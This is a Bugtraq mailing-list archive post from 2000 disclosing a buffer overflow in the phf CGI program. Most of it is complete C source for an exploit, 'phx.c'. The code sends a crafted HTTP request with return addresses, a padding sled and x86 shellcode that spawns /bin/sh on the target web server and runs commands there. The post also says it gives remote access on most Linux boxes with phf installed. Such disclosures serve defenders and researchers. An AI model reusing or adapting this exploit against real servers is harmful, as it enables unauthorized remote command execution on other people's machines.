Home page logo
/

bugtraq logo Bugtraq mailing list archives

Exploit: phf buffer overflow (CGI)
From: proton <proton () ENERGYMECH NET>
Date: Wed, 15 Nov 2000 13:51:51 +0100

Funny how a program thats almost a decade old is still around
to haunt us, isnt it?

This should be a potent reminder for all CGI authors out there
that these things can live forever.


This exploit will give remote access on most (all?) Linux-ix86
boxes (and freebsd?) with phf installed, patch or no patch,
its vulnerable.

There is only one remedy, remove it!

If your mailer(s) trash the source below, you can also download
it from http://www.energymech.net/users/proton/phx.c

/proton


//---- phx.c ----
/*
 |  phx.c -- phf buffer overflow exploit for Linux-ix86
 |  Copyright (c) 2000 by proton. All rights reserved.
 |
 |  This program is free software; you can redistribute it and/or modify
 |  it under the terms of the GNU General Public License as published by
 |  the Free Software Foundation; either version 2 of the License, or
 |  (at your option) any later version.
 |
 |  This program is distributed in the hope that it will be useful,
 |  but WITHOUT ANY WARRANTY; without even the implied warranty of
 |  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 |  GNU General Public License for more details.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>

char    tmp[8192];
char    *host;
char    *progname;

unsigned char shellcode[] =
        "GET
/cgi-bin/phf?&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&"
        /*
         *  2 pointers, in case of -fomit-frame-pointer
         */
        "\x37\xfc\xff\xbf"
        "\x37\xfc\xff\xbf"
        " HTTP/1.0\n"
        /*
         *  set environment var `HTTP_X'
         */
        "X: "
        /*
         *  a bundle of AAA's, they're just as good as NOP's
         *  but is a tad bit more readable to humans.
         *  512 no-op instructions gives us a nice phat
         *  strike-zone for the above 2 pointers.
         */

"7777777777777777777777777777777777777777777777777777777777777777"

"7777777777777777777777777777777777777777777777777777777777777777"

"7777777777777777777777777777777777777777777777777777777777777777"

"7777777777777777777777777777777777777777777777777777777777777777"

"7777777777777777777777777777777777777777777777777777777777777777"

"7777777777777777777777777777777777777777777777777777777777777777"

"7777777777777777777777777777777777777777777777777777777777777777"

"7777777777777777777777777777777777777777777777777777777777777777"
        /*
         *  exploit code
         */

"\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"

"\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"

"\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
        "\x41\x41"
        /*
         *  try to make sense to the webserver
         */
        "/bin/sh -c echo 'Content-Type: text/plain';echo '';"
        /*
         *  execute something funny!
         */
        "echo Hello! I am running as \\\"`whoami`\\\" on a `arch` cpu;"
        "echo Local time is `date` and there are `who|wc -l` users
logged in.;"
        "echo '';"
        /*
         *  shellcode will terminate command at the `@'
         */
        "@\n\n"
        ;

void netpipe(int *rsock, int *wsock)
{
        struct  sockaddr_in sai;
        struct  hostent *he;
        int     s;

        if (!host || !*host)
        {
                printf("Usage: %s <host>\n",progname);
                exit(1);
        }
        he = gethostbyname(host);
        if (!he)
        {
                printf("%s: Unknown host\n",host);
                exit(1);
        }

        s = socket(AF_INET,SOCK_STREAM,0);
        sai.sin_family = AF_INET;
        sai.sin_port = htons(80);
        memcpy(&sai.sin_addr,he->h_addr_list[0],sizeof(struct in_addr));

        if (connect(s,(struct sockaddr*)&sai,sizeof(sai)) < 0)
        {
                switch(errno)
                {
                case ECONNREFUSED:
                        output("Connection refused.\n");
                        break;
                case ETIMEDOUT:
                        output("Connection timed out.\n");
                        break;
                case ENETUNREACH:
                        output("Network unreachable.\n");
                        break;
                default:
                        output("Unknown error.\n");
                        break;
                }
                exit(1);
        }

        *rsock = *wsock = s;
}

int main(int argc, char **argv)
{
        char    *q,*cp;
        int     in,out;
        int     sz,x,n;

        progname = argv[0];
        host = argv[1];

        netpipe(&in,&out);

        write(out,shellcode,sizeof(shellcode));

        output("\nCome to papa!\n\n");

        n = x = 0;
        for(;;)
        {
                sz = read(in,&tmp[x],512-x);
                if (sz < 1)
                        break;
                x += sz;
                q = cp = tmp;
                for(sz=x;sz;)
                {
                        if (*q == '\n')
                        {
                                write(1,cp,(q-cp)+1);
                                cp = q + 1;
                        }
                        q++;
                        sz--;
                }
                if (cp != tmp)
                {
                        sz = x - (cp - tmp);
                        memcpy(tmp,cp,sz);
                        x -= (cp - tmp);
                }
        }
        exit(0);
}
//---- end of file ----


  By Date           By Thread  

Current thread:
  • Exploit: phf buffer overflow (CGI) proton (Nov 16)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]